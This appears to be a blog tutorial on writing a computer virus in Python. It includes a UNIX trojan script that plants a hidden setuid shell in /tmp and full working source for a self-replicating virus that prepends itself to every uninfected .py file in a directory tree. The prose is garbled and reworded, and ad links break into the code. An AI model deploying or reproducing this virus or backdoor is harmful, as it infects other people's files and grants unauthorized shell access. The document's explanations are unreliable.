NOTE: Please Don’t use the online compiler is not going to work here. Please install Python 2.7x to the latest version and cv2(OpenCV), argparse modules to actually try out this example.
Hey friends! Welcome back! Before continuing on with Malicious Logic, after reading this blog you will be able to make a Computer Virus Using Python – Within 10 Minutes. Newbie to Advance Tutorials.
Now, this article will focus more on applications than the theory of computer viruses, worms, and Trojan horses.
But, please note that this article is meant to be used for educational purposes only. I am not promoting the usage of viruses, worms, or trojan horses to attack computer systems and causing damage.
What is Malicious logic?
Malicious logic is a set of instructions (basically a program) that causes the violation of a security policy of a website/program/application, etc.
cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*UNIX Script
In this example, we are assuming that “………” is in the path environment and the script has been named ls and is placed in the directory.
Analyzing the script
This script creates a replica of the UNIX Shell this is setuid of the user executing this program. To apprehend setuid programs, we first want to apprehend how User Identity is saved in a UNIX OS.
In UNIX OS, user identification is commonly represented as an integer among zero and generally, 65,535. This quantity is likewise called UID (Unique Identification Number). Now, what setuid programs do is that they devise approaches with the UID of the proprietor and are now no longer of a 3rd person executing the software. This means, that an executor could have the rights of the proprietor… This in itself is a probable vulnerability.
Coming again to our script, so a setuid reproduction of the UNIX shell changed into created. Later on, this software is deleted, after which the proper ls command (for list the documents and folders present in the current running directory) is executed.
Trojan Horses
Go back to the previous script… Suppose if someone (root) typed:
If the script was typed deliberately, then it will result in a Trojan Horse.
Virus – A basic format
Most computer viruses follow the following basic script:
cp /bin/sh /tmp/.xxsh
chmod o+s,w+x /tmp.xxshYou May Like Other Tutorials;
How to make News Portal Website in 10 Minutes.
How to Design the user interface of the Creative Neumorphism ID tag using CSS and HTML.
Beginvirus
if spread-condition TRUE then begin
for the target files begin
if target affected TRUE then begin
Determine where to place virus instructions
Copy the virus instructions
Modify target to spread the virus later
End if
End for
End if
Perform some other instruction(s) //Optional
Go back to beginning
Endvirus
Basically, every computer virus has two phases –
#!/usr/bin/python
import os, datetime, inspect
DATA_TO_INSERT = "CODEWITHNEPAL"
#search for target files in path
def search(path):
filestoinfect = []
filelist = os.listdir(path)
for filename in filelist:
#If it is a folder
if os.path.isdir(path+"/"+filename):
filestoinfect.extend(search(path+"/"+filename))
#If it is a python script -> Infect it
elif filename[-3:] == ".py":
#default value
infected = False
for line in open(path+"/"+filename):
if DATA_TO_INSERT in line:
infected = True
break
if infected == False:
filestoinfect.append(path+"/"+filename)
return filestoinfect
#changes to be made in the target file
def infect(filestoinfect):
target_file = inspect.currentframe().f_code.co_filename
virus = open(os.path.abspath(target_file))
virusstring = ""
for i,line in enumerate(virus):
if i>=0 and i <41:
virusstring += line
virus.close
for fname in filestoinfect:
f = open(fname)
temp = f.read()
f.close()
f = open(fname,"w")
f.write(virusstring + temp)
f.close()
#Not required actually
def explode():
if datetime.datetime.now().month == 4 and datetime.datetime.now().day == 1:
print ("HAPPY APRIL FOOL'S DAY!!")
filestoinfect = search(os.path.abspath(""))
infect(filestoinfect)
explode()
- Insertion phase – in this phase, the virus inserts itself into the target.
- Execution phase– in this phase, the virus performs some actions.
Let’s take a look at a real virus in Python. Now, this is not an actual virus that will cause corruption files, deletion of system files, etc. but just a simple harmless virus.
